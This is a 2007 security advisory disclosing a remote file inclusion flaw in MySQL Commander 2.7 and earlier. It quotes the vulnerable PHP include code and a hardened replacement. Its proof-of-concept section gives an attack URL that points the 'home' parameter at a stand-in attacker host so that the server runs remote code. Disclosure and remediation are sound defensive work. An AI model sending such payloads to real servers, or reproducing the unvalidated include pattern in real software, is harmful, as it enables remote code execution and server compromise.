[ECHO_ADV_73$2007] MySQL Commander <= 2.7 (home) Remote File Inclusion Vulnerability

Published 2007-03-13 on vulners.com

Author : M.Hasran Addahroni
Date : March, 13th 2007
Location : Australia, Sydney
Web : http://advisories.echo.or.id/adv/adv73-K-159-2007.txt
Critical Lvl : Dangerous
Impact : System access
Where : From Remote

Affected software description:


Application   : MySQL Commander
Version       : <= 2.7
Vendor        : http://www.bitesser.de/freeware/script.php?id=1
Description :

A small tool to back up and restore MySQL tables. Features: backup/restore of binaries; parametric backup; multiserver; gzipping; deletion of backup files; German/English; online help in a popup.
This tool makes backups of all the tables in a database. The data is stored in text files located in the "data" directory. You can back up and restore both the "SQL create table command" and the "content", so you can easily make copies of your tables (i.e. copy a whole database with a few clicks).
You will need PHP 4.1 or later and MySQL 3.23 or later.

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~
- Unsafe include in ressourcen/dbopen.php ($home is used in include statements without ever being initialized or validated in this file):

----------------ressourcen/dbopen.php-------------------
<?php
// $home is not set anywhere before these two includes
include $home."ressourcen/class.systemObject.php";
include $home."ressourcen/class.DatabaseMysql.php";
$db = new DatabaseMysql($config->dbuser[$_SESSION['which_db']], $config->dbpass[$_SESSION['which_db']], $config->dbserver[$_SESSION['which_db']]);
$ok = $db->init();

if (!$ok and $db->error and (strlen($config->dbserver[1]) > 0)) {
        echo $db->getError();
}

?>
----------------------------------------------------------------


The variable $home is not properly sanitized: it is never assigned in the file before it is used as the prefix of an include path, so its value comes straight from the request.
When register_globals=on and allow_url_fopen=on, an attacker can set $home to a remote URL and have the server include and execute a PHP script of their choosing.


Poc/Exploit:
~~~~~~~~~

http://www.target.com/[mysqlcommander_path]/ressourcen/dbopen.php?home=http://attacker.com/evil?


Solution:
~~~~~~

- Initialize and validate $home in the affected file instead of accepting it from the request.
- Turn off register_globals.
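A hardened form of ressourcen/dbopen.php, added here as an illustration of the fix and not taken from the vendor's code: $home is derived from the script's own location, overriding anything register_globals may have injected, and both include paths are resolved with realpath() and rejected unless they stay inside the application directory. It assumes the original layout (this file in <app>/ressourcen/ next to the two class files) and PHP 5.1 or later for RuntimeException; the helper name safe_local_path is an assumption.

```php
<?php
// Hardened variant of ressourcen/dbopen.php (added example, not vendor code).
// Assumes the original layout: this file lives in <app>/ressourcen/ and the
// two class files sit beside it. Requires PHP 5.1+ for RuntimeException.

// 1. Never let the request decide where includes come from. Derive $home from
//    this file's own location; this also overwrites any value that
//    register_globals may have populated from the query string.
$home = dirname(dirname(__FILE__)) . '/';

// 2. Resolve a path relative to $home and refuse anything that does not end
//    up inside it: remote URLs and stream wrappers (realpath() returns false
//    for them), ../ traversal, and symlinks pointing outside the tree.
function safe_local_path($home, $relative)
{
    $base = realpath($home);
    $full = realpath($home . $relative);
    if ($base === false || $full === false
        || strpos($full, $base . DIRECTORY_SEPARATOR) !== 0) {
        // Do not echo the rejected value back to the client.
        throw new RuntimeException('Refusing to include a file outside the application directory');
    }
    return $full;
}

require_once safe_local_path($home, 'ressourcen/class.systemObject.php');
require_once safe_local_path($home, 'ressourcen/class.DatabaseMysql.php');

// 3. The remainder is the original logic, unchanged.
$db = new DatabaseMysql($config->dbuser[$_SESSION['which_db']],
                        $config->dbpass[$_SESSION['which_db']],
                        $config->dbserver[$_SESSION['which_db']]);
$ok = $db->init();

if (!$ok and $db->error and (strlen($config->dbserver[1]) > 0)) {
    echo $db->getError();
}
?>
```

Turning off register_globals remains necessary on its own, since other scripts in the package may rely on request-supplied variables in the same way.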

---------------------------------------------------------------------------

Shoutz:
~~~~
~ ping - my dearest wife, and my little son, for all the luv the tears n the breath
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,negative, str0ke (for the best comments)
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ SinChan,h4ntu,cow_1seng,sakitjiwa, m_beben, rizal, cR4SH3R, madkid, kuntua, stev_manado, nofry, x16
~ [email protected]
~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------
Contact:
~~~~~

     K-159 || echo|staff || eufrato[at]gmail[dot]com
     Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------